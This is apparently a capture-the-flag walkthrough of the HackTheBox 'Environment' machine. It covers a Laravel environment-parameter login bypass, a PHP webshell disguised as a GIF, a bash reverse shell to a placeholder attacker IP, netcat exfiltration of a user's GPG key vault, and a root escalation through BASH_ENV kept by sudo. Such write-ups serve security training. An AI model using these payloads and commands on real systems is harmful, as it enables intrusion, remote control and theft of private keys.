All write-ups
5 min read

HackTheBox: Environment

HackTheBoxLinuxLaravelGPGPATH HijackingPrivilege Escalation

HackTheBox: Environment

1. Reconnaissance

The initial phase begins with a comprehensive port scan to identify exposed services.

sudo nmap -sCV -T4 10.129.x.x -oA nmap-initial

Results:

Local DNS Configuration:

echo "10.129.x.x    environment.htb" | sudo tee -a /etc/hosts

Directory Enumeration: Using tools like feroxbuster or dirsearch revealed two critical endpoints:

2. Initial Access

The target application runs Laravel 11.30.0 with APP_DEBUG=True, exposing stack traces that leak framework details. We bypassed the authentication logic by exploiting the environment parameter:

POST /login?--env=preprod HTTP/1.1
Host: environment.htb
...

Intercepting the login request with Burp Suite and modifying the URL to append ?--env=preprod bypasses the standard authentication checks, granting internal access.

Webshell Upload

With authenticated access, the /upload endpoint accepts multipart/form-data. We bypassed file type restrictions by camouflaging a PHP webshell as a GIF image.

Payload (simple-backdoor.php):

GIF89a;
<?=$_="cmd";@system($_REQUEST[$_]);?>

Execution: Trigger the reverse shell by accessing the uploaded file:

http://environment.htb/storage/files/simple-backdoor.php?cmd=bash+-c+'bash+-i+>&+/dev/tcp/<ATTACKER_IP>/4242+0>&1'

Result: Gained initial foothold as www-data.

3. Lateral Movement to hish

While exploring the filesystem as www-data, we located a backup GPG key vault belonging to the user hish.

Exfiltration:

# On attacker machine
nc -nlvp 4444 > keyvault.gpg

# On target
nc <ATTACKER_IP> 4444 < /home/hish/backup/keyvault.gpg

Because GPG relies on asymmetric encryption, decrypting keyvault.gpg requires hish's private key located in /home/hish/.gnupg/private-keys-v1.d/. Only hish has read access. However, through further enumeration, a hardcoded password or credential reuse allowed SSH access as hish:

ssh hish@environment.htb
# Password: [REDACTED]

Decrypting the Vault: Extract the .gnupg directory via SSH/nc, then decrypt the vault locally:

# On attacker machine
tar -xvf gnupg.tar
mv ~/.gnupg ~/.gnupg_backup
mv ./home/hish/.gnupg ~/.gnupg
gpg --decrypt keyvault.gpg

Result: Gained further sensitive information.

4. Privilege Escalation to Root

Checking sudo privileges for hish reveals:

hish@environment:~$ sudo -l
User hish may run the following commands:
  (ALL) /usr/bin/systeminfo

/usr/bin/systeminfo is a bash script running with root privileges. It executes system commands (dmesg, ss, mount) without absolute paths. Crucially, the sudoers configuration allows passing the BASH_ENV variable: env_keep+="ENV BASH_ENV"

PATH Hijacking via BASH_ENV

When bash is invoked, it reads and executes the file specified in BASH_ENV before executing the actual script. We can leverage this to execute a malicious script as root.

Exploit:

echo 'echo "ROOTED"; id; /bin/bash -p' > /tmp/root.sh
chmod +x /tmp/root.sh
env -i BASH_ENV=/tmp/root.sh \
  PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \
  sudo /usr/bin/systeminfo

Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).


Mechanism of Action: The --env=preprod bypass is a logical framework abuse, not a CVE. The PATH hijacking technique succeeded because the sudoers file explicitly preserved BASH_ENV.